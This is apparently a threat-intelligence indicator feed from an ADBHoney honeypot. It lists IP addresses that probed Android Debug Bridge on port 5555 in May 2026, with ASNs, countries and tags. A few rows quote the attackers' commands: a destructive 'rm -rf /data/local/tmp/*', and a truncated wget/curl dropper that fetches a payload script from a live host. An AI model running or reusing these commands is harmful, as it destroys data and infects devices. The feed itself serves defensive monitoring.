IPv4	20.252.27.216	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=8075; asn_org=Microsoft Corporation; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=14 \| first_seen=2026-05-06T09:51:16.000Z \| last_seen=2026-05-06T11:40:53.333Z \| ports=5555 \| cc=US \| asn=8075 \| org=Microsoft Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-06
IPv4	152.89.218.126	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=RU; asn=56694; asn_org=LLC Smart Ape; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=13 \| first_seen=2026-05-06T12:09:42.000Z \| last_seen=2026-05-15T04:45:49.766Z \| ports=5555 \| cc=RU \| asn=56694 \| org=LLC Smart Ape	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-06
IPv4	160.119.76.62	Attacker IP • ADB / seen in ADBHoney; events=51; ports=5555; cc=SC; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=65 \| first_seen=2026-05-06T12:20:13.000Z \| last_seen=2026-05-06T15:14:52.852Z \| ports=5555 \| cc=SC \| asn=49870 \| org=Alsycon B.V.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-06
IPv4	175.178.72.193	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-06T13:33:08.000Z \| last_seen=2026-05-06T13:34:14.281Z \| ports=5555 \| cc=CN \| asn=45090 \| org=Shenzhen Tencent Computer Systems Company Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-06
IPv4	74.82.47.2	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=15 \| first_seen=2026-05-06T14:19:12.000Z \| last_seen=2026-05-16T00:58:45.594Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-06
IPv4	74.82.47.26	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-06T14:17:14.000Z \| last_seen=2026-05-06T14:18:18.784Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-06
IPv4	104.248.250.218	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=DE; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-06T15:47:35.000Z \| last_seen=2026-05-06T15:48:37.312Z \| ports=5555 \| cc=DE \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-06
IPv4	119.247.97.228	Attacker IP • ADB / seen in ADBHoney; events=38; ports=5555; cc=HK; asn=9269; asn_org=Hong Kong Broadband Network Ltd.; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp/*" Observed in ADBHoney telemetry for 2026-05. events=38 \| first_seen=2026-05-06T15:08:13.000Z \| last_seen=2026-05-06T15:23:25.406Z \| ports=5555 \| cc=HK \| asn=9269 \| org=Hong Kong Broadband Network Ltd. \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,71ecfb7bbc015b2b192c05f726468b6f08fcc804c093c718b950e688cc414af5	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-06
IPv4	198.74.58.148	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-06T15:51:11.000Z \| last_seen=2026-05-06T15:52:14.226Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-06
IPv4	64.227.161.81	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=IN; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=17 \| first_seen=2026-05-06T16:26:05.000Z \| last_seen=2026-05-06T16:36:18.782Z \| ports=5555 \| cc=IN \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-06
IPv4	183.232.212.194	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-06T18:23:56.000Z \| last_seen=2026-05-06T18:25:06.005Z \| ports=5555 \| cc=CN \| asn=9808 \| org=China Mobile Communications Group Co., Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-06
IPv4	147.185.132.252	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=23 \| first_seen=2026-05-06T20:16:03.000Z \| last_seen=2026-05-06T20:27:37.354Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-06
IPv4	172.105.177.106	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=AU; asn=63949; asn_org=Akamai Connected Cloud; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-07T01:19:55.000Z \| last_seen=2026-05-07T01:30:03.359Z \| ports=5555 \| cc=AU \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-07
IPv4	178.220.57.112	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=RS; asn=8400; asn_org=TELEKOM SRBIJA a.d.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-07T02:07:21.000Z \| last_seen=2026-05-07T02:17:25.028Z \| ports=5555 \| cc=RS \| asn=8400 \| org=TELEKOM SRBIJA a.d.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-07
IPv4	45.135.194.83	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=DE; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=330 \| first_seen=2026-05-07T02:50:37.000Z \| last_seen=2026-05-18T21:20:20.439Z \| ports=5555 \| cc=DE \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-07
IPv4	64.62.156.172	Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=40 \| first_seen=2026-05-07T04:01:45.000Z \| last_seen=2026-05-31T08:56:47.909Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-07
IPv4	114.98.177.179	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=140527; asn_org=China Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-07T05:45:22.000Z \| last_seen=2026-05-07T05:46:22.963Z \| ports=5555 \| cc=CN \| asn=140527 \| org=China Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-07
IPv4	114.98.177.181	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=CN; asn=140527; asn_org=China Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=13 \| first_seen=2026-05-07T05:45:24.000Z \| last_seen=2026-05-21T14:23:22.049Z \| ports=5555 \| cc=CN \| asn=140527 \| org=China Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-07
IPv4	54.184.100.170	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-07T05:38:40.000Z \| last_seen=2026-05-07T05:39:48.847Z \| ports=5555 \| cc=US \| asn=16509 \| org=Amazon.com, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-07
IPv4	116.116.87.44	Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=3 \| first_seen=2026-05-07T06:56:52.000Z \| last_seen=2026-05-07T06:57:56.702Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-07
IPv4	193.46.255.156	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=RO; asn=47890; asn_org=Unmanaged Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-07T06:38:53.000Z \| last_seen=2026-05-07T06:39:56.867Z \| ports=5555 \| cc=RO \| asn=47890 \| org=Unmanaged Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-07
IPv4	108.165.95.7	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=400536; asn_org=Nodestop LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=13 \| first_seen=2026-05-07T10:51:12.000Z \| last_seen=2026-05-10T04:56:38.064Z \| ports=5555 \| cc=US \| asn=400536 \| org=Nodestop LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-07
IPv4	64.23.181.60	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=17 \| first_seen=2026-05-07T10:45:47.000Z \| last_seen=2026-05-07T10:55:59.486Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-07
IPv4	176.65.139.254	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=111 \| first_seen=2026-05-07T13:32:06.000Z \| last_seen=2026-05-29T22:59:17.346Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-07
IPv4	64.62.197.82	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-07T15:54:42.000Z \| last_seen=2026-05-07T15:55:42.890Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-07
IPv4	162.216.149.191	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=16 \| first_seen=2026-05-07T16:17:42.000Z \| last_seen=2026-05-07T16:28:55.495Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-07
IPv4	117.134.197.79	Attacker IP • ADB / seen in ADBHoney; events=12; ports=5555; cc=PK; asn=138423; asn_org=CMPak Limited; cats=Attempted Administrator Privilege Gain; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=12 \| first_seen=2026-05-07T19:14:15.000Z \| last_seen=2026-05-07T19:24:29.939Z \| ports=5555 \| cc=PK \| asn=138423 \| org=CMPak Limited	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-05-07
IPv4	137.184.95.100	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=17 \| first_seen=2026-05-07T19:43:38.000Z \| last_seen=2026-05-07T19:54:39.376Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-07
IPv4	103.167.90.113	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=VN; asn=63737; asn_org=VIETSERVER SERVICES TECHNOLOGY COMPANY LIMITED; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-07T20:43:06.000Z \| last_seen=2026-05-07T20:44:10.463Z \| ports=5555 \| cc=VN \| asn=63737 \| org=VIETSERVER SERVICES TECHNOLOGY COMPANY LIMITED	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-07
IPv4	13.57.36.96	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=16509; asn_org=Amazon.com, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-07T21:20:46.000Z \| last_seen=2026-05-07T21:31:31.205Z \| ports=5555 \| cc=US \| asn=16509 \| org=Amazon.com, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-07
IPv4	5.63.151.109	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=GB; asn=13213; asn_org=Thg Hosting Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-07T21:20:35.000Z \| last_seen=2026-05-07T21:21:43.880Z \| ports=5555 \| cc=GB \| asn=13213 \| org=Thg Hosting Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-07
IPv4	51.158.200.85	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=NL; asn=12876; asn_org=Scaleway SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-07T21:56:57.000Z \| last_seen=2026-05-07T21:57:58.715Z \| ports=5555 \| cc=NL \| asn=12876 \| org=Scaleway SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-07
IPv4	125.78.242.26	Attacker IP • ADB / seen in ADBHoney; events=41; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=41 \| first_seen=2026-05-08T00:06:33.000Z \| last_seen=2026-05-08T00:27:06.695Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-08
IPv4	206.189.93.68	Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=SG; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=1; cmd="cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget -q http://168.220.248.106:9087/payload/a6i3khk75wgf/su9wyp.sh -O su9wyp.sh \|\| curl -s -o su9wyp.sh h" Observed in ADBHoney telemetry for 2026-05. events=211 \| first_seen=2026-05-08T01:39:01.000Z \| last_seen=2026-05-09T13:23:12.750Z \| ports=5555 \| cc=SG \| asn=14061 \| org=DigitalOcean, LLC	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-05-08
IPv4	216.226.76.20	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=50219; asn_org=Valence Technology Co.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=28 \| first_seen=2026-05-08T01:58:19.000Z \| last_seen=2026-05-08T02:43:03.523Z \| ports=5555 \| cc=US \| asn=50219 \| org=Valence Technology Co.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-08
IPv4	147.185.132.25	Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=24 \| first_seen=2026-05-08T02:13:39.000Z \| last_seen=2026-05-08T02:25:14.522Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-08
IPv4	194.180.49.76	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=BG; asn=201814; asn_org=MEVSPACE sp. z o.o.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=11 \| first_seen=2026-05-08T02:35:06.000Z \| last_seen=2026-05-18T10:35:13.399Z \| ports=5555 \| cc=BG \| asn=201814 \| org=MEVSPACE sp. z o.o.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-08
IPv4	174.169.139.85	Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=US; asn=7922; asn_org=Comcast Cable Communications, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=14 \| first_seen=2026-05-08T03:59:44.000Z \| last_seen=2026-05-08T04:09:59.100Z \| ports=5555 \| cc=US \| asn=7922 \| org=Comcast Cable Communications, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-08
IPv4	45.156.87.67	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=10 \| first_seen=2026-05-08T06:05:50.000Z \| last_seen=2026-05-09T20:28:01.509Z \| ports=5555 \| cc=NL \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-08
IPv4	47.251.245.44	Attacker IP • ADB / seen in ADBHoney; events=60; ports=5555; cc=US; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; adb_cmd_hits=2 Observed in ADBHoney telemetry for 2026-05. events=60 \| first_seen=2026-05-08T06:50:35.000Z \| last_seen=2026-05-08T06:52:47.017Z \| ports=5555 \| cc=US \| asn=45102 \| org=Alibaba US Technology Co., Ltd.	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-05-08
IPv4	138.197.118.33	Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=18 \| first_seen=2026-05-08T09:07:16.000Z \| last_seen=2026-05-08T09:17:32.977Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-08
IPv4	185.217.0.181	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=SE; asn=42237; asn_org=w1n ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-08T09:10:01.000Z \| last_seen=2026-05-08T09:11:09.758Z \| ports=5555 \| cc=SE \| asn=42237 \| org=w1n ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-08
IPv4	64.62.197.32	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=17 \| first_seen=2026-05-08T11:27:34.000Z \| last_seen=2026-05-11T15:32:34.428Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-08
IPv4	64.62.197.35	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-08T11:26:19.000Z \| last_seen=2026-05-08T11:27:27.297Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-08
IPv4	2.26.105.129	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=215590; asn_org=DpkgSoft International Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-08T13:34:54.000Z \| last_seen=2026-05-08T13:45:05.313Z \| ports=5555 \| cc=US \| asn=215590 \| org=DpkgSoft International Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-08
IPv4	216.128.152.79	Attacker IP • ADB / seen in ADBHoney; events=109; ports=5555; cc=US; asn=20473; asn_org=The Constant Company, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=126 \| first_seen=2026-05-08T13:07:52.000Z \| last_seen=2026-05-08T14:17:00.291Z \| ports=5555 \| cc=US \| asn=20473 \| org=The Constant Company, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-08
IPv4	141.98.10.102	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=LT; asn=209605; asn_org=UAB Host Baltic; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-08T14:27:33.000Z \| last_seen=2026-05-08T14:28:41.019Z \| ports=5555 \| cc=LT \| asn=209605 \| org=UAB Host Baltic	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-08
IPv4	20.80.88.247	Attacker IP • ADB / seen in ADBHoney; events=27; ports=5555; cc=US; asn=8075; asn_org=Microsoft Corporation; cats=Detection of a Network Scan; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=27 \| first_seen=2026-05-08T14:22:59.000Z \| last_seen=2026-05-08T14:35:07.118Z \| ports=5555 \| cc=US \| asn=8075 \| org=Microsoft Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-08
IPv4	172.236.117.243	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-08T15:50:18.000Z \| last_seen=2026-05-08T15:51:23.587Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-08
IPv4	64.62.197.212	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=7 \| first_seen=2026-05-08T15:38:09.000Z \| last_seen=2026-05-08T15:48:11.447Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-08
IPv4	64.62.197.220	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-08T15:37:13.000Z \| last_seen=2026-05-08T15:38:14.306Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-08
IPv4	157.230.235.63	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-08T19:25:14.000Z \| last_seen=2026-05-08T19:26:21.710Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-08
IPv4	195.170.172.225	Attacker IP • ADB / seen in ADBHoney; events=71; ports=5555; cc=ES; asn=41608; asn_org=NextGenWebs, S.L.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=71 \| first_seen=2026-05-08T19:01:26.000Z \| last_seen=2026-05-08T19:12:41.591Z \| ports=5555 \| cc=ES \| asn=41608 \| org=NextGenWebs, S.L.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-08
IPv4	58.23.87.246	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; cats=Attempted Administrator Privilege Gain; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=11 \| first_seen=2026-05-08T19:50:44.000Z \| last_seen=2026-05-08T20:01:07.875Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-05-08
IPv4	31.57.129.10	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=AE; asn=210718; asn_org=Five Cyber Host Security S.r.l.; cats=Misc activity; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=33 \| first_seen=2026-05-08T21:02:37.000Z \| last_seen=2026-05-08T23:15:34.847Z \| ports=5555 \| cc=AE \| asn=210718 \| org=Five Cyber Host Security S.r.l.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-08
IPv4	66.183.145.29	Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=CA; asn=852; asn_org=TELUS Communications; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=3 \| first_seen=2026-05-09T03:23:48.000Z \| last_seen=2026-05-09T03:24:48.930Z \| ports=5555 \| cc=CA \| asn=852 \| org=TELUS Communications	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-09
IPv4	147.185.132.219	Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=23 \| first_seen=2026-05-09T04:59:08.000Z \| last_seen=2026-05-09T05:10:42.936Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-09
IPv4	119.114.254.149	Attacker IP • ADB / seen in ADBHoney; events=35; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp/*" Observed in ADBHoney telemetry for 2026-05. events=35 \| first_seen=2026-05-09T06:29:00.000Z \| last_seen=2026-05-09T06:44:09.609Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone \| related_hashes=76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-09
IPv4	195.230.103.243	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=211607; asn_org=Securitytrails, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-09T06:12:42.000Z \| last_seen=2026-05-09T06:13:49.050Z \| ports=5555 \| cc=US \| asn=211607 \| org=Securitytrails, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-09
IPv4	45.156.129.101	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=PT; asn=211680; asn_org=Sistemas Informaticos, S.A.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-09T06:30:19.000Z \| last_seen=2026-05-09T06:31:26.110Z \| ports=5555 \| cc=PT \| asn=211680 \| org=Sistemas Informaticos, S.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-09
IPv4	45.156.129.103	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=PT; asn=211680; asn_org=Sistemas Informaticos, S.A.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-09T06:32:04.000Z \| last_seen=2026-05-09T06:42:18.173Z \| ports=5555 \| cc=PT \| asn=211680 \| org=Sistemas Informaticos, S.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-09
IPv4	183.232.212.195	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-09T07:54:18.000Z \| last_seen=2026-05-09T07:55:23.378Z \| ports=5555 \| cc=CN \| asn=9808 \| org=China Mobile Communications Group Co., Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-09
IPv4	108.165.95.12	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=400536; asn_org=Nodestop LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=23 \| first_seen=2026-05-09T08:29:09.000Z \| last_seen=2026-05-11T17:48:31.003Z \| ports=5555 \| cc=US \| asn=400536 \| org=Nodestop LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-09
